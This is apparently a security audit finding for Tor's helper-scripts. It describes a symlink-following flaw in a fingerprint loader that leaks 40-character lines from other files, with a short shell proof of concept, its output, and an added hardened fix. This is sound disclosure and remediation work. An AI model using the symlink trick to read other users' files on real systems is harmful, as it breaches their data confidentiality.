TOR-014 pen-torproject#14: helper-scripts - Limited File Read in badconf-entry due to insecure Fingerprint validation via symlinks
Due to insufficient validation of fingerprints and the following symlinks, low-privileged attackers on the same system can leak content from other files.
Technical Description
The `load_args_as_fp` function reads a file via `open` and, via `print`, echoes every line that is exactly 40 characters long and does not start with a `#`. Because the fingerprint itself is not validated and symlinks are followed, a low-privileged attacker could potentially leak sensitive information from other files.
helper-scripts/util.py:

```python
import os


def load_args_as_fp(args, fps):
    # Try to load the filename as arg.
    if len(args) > 1:
        filename = args[1]
        # os.path.exists() follows symlinks, so a symlink to any readable file passes.
        if os.path.exists(filename):
            print("[+] Using file %s..." % (filename))
            with open(filename, "r") as fd:
                for line in fd:
                    line = line.strip()
                    # Ignore commented fingerprint
                    if line.startswith("#"):
                        continue
                    # Only the length is checked; the content is never validated as hex.
                    if len(line) != 40:
                        continue
                    if line not in fps:
                        fps.append(line)
                        # Any 40-character line is echoed back here.
                        print(" [+] Adding %s" % (line))
```
Proof of Concept

1. Create leak file: `echo -e "B\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nC" > leak_me`
2. Symlink file: `ln -sf leak_me fps.txt`
3. Run vulnerable script: `python3 badconf-entry.py fps.txt`

Output with leaked string `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`. The string is leaked on stdout and within the file `approved-routers.d/approved-routers.conf`:

```
[+] Tor documents loaded successfully
- 6925 relays in consensus
- 7188 server descriptors
- 2204 bridge descriptors published in the last day
[+] Using file fps.txt...
 [+] Adding AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
No AuthDirReject rules to create...
Continuing with !reject rules.
```
Impact
Low-privileged users may be able to leak sensitive data from files, depending on the configuration of the system. Since only lines of exactly 40 characters are printed, the attacker scenario is limited and this vulnerability has been rated as Low.
Recommendation
Validate the fingerprint with the regular expression `^[0-9A-Fa-f]{40}$` or use stem, and don't follow symlinks.
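The following is an added example of how the recommendation could be applied to the loader shown above; it is not the helper-scripts project's own code. It assumes the same call shape as `load_args_as_fp` (`args` is `argv`, `fps` is a list extended in place) and the hypothetical name `load_args_as_fp_hardened`. Two checks are combined: the fingerprint regex from the recommendation, and a refusal to open a symlinked input (an `os.path.islink` check plus `O_NOFOLLOW` on the open, so a link swapped in between the check and the open still fails). Note that the regex alone would not stop the report's specific PoC line, since forty `A` characters are valid hex; it is the symlink refusal that blocks reading `leak_me` through `fps.txt`. The `demo()` function rebuilds the report's scenario with constructed files in a temporary directory.

```python
import os
import re
import tempfile

# Fingerprint pattern from the report's recommendation: exactly 40 hex digits.
FINGERPRINT_RE = re.compile(r"^[0-9A-Fa-f]{40}$")


def open_nofollow(path):
    """Open path read-only, refusing to follow a symlink at the final component.

    O_NOFOLLOW makes os.open() fail if path itself is a symlink. It is a POSIX
    flag; on platforms without it we fall back to a plain open and rely on the
    islink() check in the caller (assumption: the scripts run on Linux).
    """
    flags = os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags)
    return os.fdopen(fd, "r")


def load_args_as_fp_hardened(args, fps):
    """Hypothetical hardened loader. Returns the number of fingerprints added and
    raises ValueError instead of following a symlinked input file."""
    if len(args) <= 1:
        return 0
    filename = args[1]
    # lstat-based check first so the error is explicit; open_nofollow() below
    # closes the check-then-open window.
    if os.path.islink(filename):
        raise ValueError("refusing to follow symlink: %s" % filename)
    added = 0
    with open_nofollow(filename) as fd:
        for line in fd:
            line = line.strip()
            if line.startswith("#"):
                continue
            # Only 40 hex digits qualify; anything else is skipped silently
            # rather than being echoed back to stdout.
            if not FINGERPRINT_RE.match(line):
                continue
            # Design choice: normalise to upper case so the same relay is not
            # added twice under different casing.
            line = line.upper()
            if line not in fps:
                fps.append(line)
                added += 1
    return added


def demo():
    """Rebuild the report's scenario with constructed files and return what the
    hardened loader does with (a) a symlink and (b) a plain file."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        # (a) leak_me with a 40-character line, reached through the symlink fps.txt
        leak = os.path.join(d, "leak_me")
        with open(leak, "w") as f:
            f.write("B\n" + "A" * 40 + "\nC\n")
        link = os.path.join(d, "fps.txt")
        os.symlink(leak, link)
        fps = []
        try:
            load_args_as_fp_hardened(["badconf-entry.py", link], fps)
            results["symlink"] = "followed"
        except ValueError:
            results["symlink"] = "rejected"
        results["symlink_fps"] = list(fps)

        # (b) a plain file: a comment, a 40-char non-hex line, and one real-looking
        # fingerprint written twice in different case (constructed sample value)
        plain = os.path.join(d, "plain.txt")
        with open(plain, "w") as f:
            f.write("# comment\n")
            f.write("G" * 40 + "\n")
            f.write("0123456789abcdef0123456789abcdef01234567\n")
            f.write("0123456789ABCDEF0123456789ABCDEF01234567\n")
        fps = []
        results["plain_added"] = load_args_as_fp_hardened(["badconf-entry.py", plain], fps)
        results["plain_fps"] = list(fps)
    return results


if __name__ == "__main__":
    print(demo())
</test>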
Type
CWE-61: UNIX Symbolic Link (Symlink) Following